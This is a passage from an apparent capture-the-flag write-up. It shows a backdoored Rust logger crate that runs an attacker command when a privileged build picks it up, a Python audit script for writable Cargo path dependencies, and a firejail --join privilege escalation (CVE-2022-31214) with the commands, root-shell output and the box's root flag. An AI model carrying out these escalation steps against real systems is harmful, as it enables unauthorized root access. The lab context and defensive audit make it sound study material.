        .arg(command)
        .output()
        .expect("panic");

    if output.status.success() {
        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);

        println!("stdout: {}", stdout);
        println!("stderr: {}", stderr);
    } else {
        let stderr = String::from_utf8_lossy(&output.stderr);
        eprintln!("stderr: {}", stderr);
    }

    // Original logging behaviour kept so access.log is still written.
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

And build it to make sure it compiles:

cargo build

When the job seen in ps runs again it rebuilds tipnet against the modified crate and executes it as atlas, and we catch the shell:

[screenshot]

From here the meterpreter steps above can be repeated for a more convenient session.
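The root cause of this step is a build that runs as a more privileged user (atlas) while a path dependency it compiles lives in a directory a less privileged user can modify. The script below is an added example of the audit a practitioner would run to find such cases; it is mine, not from this write-up or from the tipnet project. It reads the path dependencies out of a Cargo.toml and reports every file or directory under them that someone other than the build user could write to, checking mode bits and ownership directly rather than eyeballing ls. The project it audits is constructed by the code in a temporary directory, with a world-writable lib.rs standing in for the logger crate; `audit_path_deps`, `writable_by_others` and the minimal manifest regex are hypothetical names of my own.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Minimal parser for the one-line table form used in tipnet's manifest:
#   name = {path = "..."}   (enough for this audit; not a full TOML parser)
PATH_DEP = re.compile(r'^\s*([\w-]+)\s*=\s*\{[^}]*\bpath\s*=\s*"([^"]+)"', re.M)


def path_dependencies(manifest: Path) -> dict[str, Path]:
    """Crate name -> resolved directory for every path dependency in a Cargo.toml."""
    return {name: (manifest.parent / rel).resolve()
            for name, rel in PATH_DEP.findall(manifest.read_text())}


def writable_by_others(path: Path, build_uid: int, build_gids: set[int]):
    """Reason a uid other than the build user (or root) could modify this path, else None."""
    st = path.lstat()
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid not in build_gids:
        return f"group-writable by gid {st.st_gid}, which is not one of the build user's groups"
    if st.st_uid not in (build_uid, 0):
        return f"owned by uid {st.st_uid}, who can chmod and rewrite it at will"
    return None


def audit_path_deps(manifest: Path, build_uid: int, build_gids: set[int]) -> list[tuple[str, str, str]]:
    """(crate, path, reason) for every file or directory of a path dependency that someone
    other than the build user could modify. Directories count too: a writable directory
    lets an attacker replace the files inside it even when those files are read-only."""
    findings = []
    for name, directory in path_dependencies(manifest).items():
        for p in [directory, *sorted(directory.rglob("*"))]:
            reason = writable_by_others(p, build_uid, build_gids)
            if reason:
                findings.append((name, str(p.relative_to(directory.parent)), reason))
    return findings


def audit_as_current_user(manifest: Path) -> list[tuple[str, str, str]]:
    """Audit as if the current user were the one running `cargo run` (atlas in the write-up)."""
    return audit_path_deps(manifest, os.getuid(), {os.getgid(), *os.getgroups()})


def build_sample_project() -> Path:
    """Constructed stand-in for /opt/tipnet and /opt/crates/logger in a temp dir.
    Modes are set explicitly so the result does not depend on the caller's umask;
    lib.rs is deliberately world-writable, the weak setting this audit is meant to catch."""
    root = Path(tempfile.mkdtemp())
    proj, crate = root / "tipnet", root / "crates" / "logger"
    (crate / "src").mkdir(parents=True)
    proj.mkdir()
    (proj / "Cargo.toml").write_text(
        '[package]\nname = "tipnet"\nversion = "0.1.0"\nedition = "2021"\n\n'
        '[dependencies]\nchrono = "0.4"\nlogger = {path = "../crates/logger"}\n')
    (crate / "Cargo.toml").write_text('[package]\nname = "logger"\nversion = "0.1.0"\n')
    (crate / "src" / "lib.rs").write_text(
        'pub fn log(user: &str, query: &str, justification: &str) {}\n')
    for d in (root / "crates", proj, crate, crate / "src"):
        d.chmod(0o755)
    for f in (proj / "Cargo.toml", crate / "Cargo.toml"):
        f.chmod(0o644)
    (crate / "src" / "lib.rs").chmod(0o666)
    return proj / "Cargo.toml"


if __name__ == "__main__":
    for crate, path, reason in audit_as_current_user(build_sample_project()):
        print(f"[{crate}] {path}: {reason}")
```

Run it against a real manifest with the uid and group set of the account that performs the build (not the account running the audit); on the box that would be atlas, and the first flagged entry is the file to rewrite. The fix is the mirror image: path dependencies built by a privileged account must be owned by that account or root and not writable by anyone else.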

SUID

Search for root-owned SUID binaries:

$ find / -perm -4000 -user root 2>/dev/null
...
/usr/local/bin/firejail
...
$ ls -la /usr/local/bin/firejail
-rwsr-x--- 1 root jailer 1777952 Nov 29  2022 /usr/local/bin/firejail

Use the publicly documented firejail --join privilege escalation (CVE-2022-31214; exploit.py is the public proof of concept). The binary is mode -rwsr-x--- root:jailer, so only members of the jailer group can execute it; check with id that the user of the current shell is in that group before trying:

$ chmod +x exploit.py
$ python3 exploit.py
# in another terminal, joining the sandbox whose PID exploit.py reported
$ firejail --join=462481
Warning: cleaning all supplementary groups
Child process initialized in 19.90 ms
changing root to /proc/462481/root
$ su -
$ id
uid=0(root) gid=0(root) groups=0(root)

Root flag

id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
Cleanup
domain.crt
domain.csr
domain.key
root.txt
cat root.txt
434a8221bf7500bb534886d28ce53e2d

[screenshot]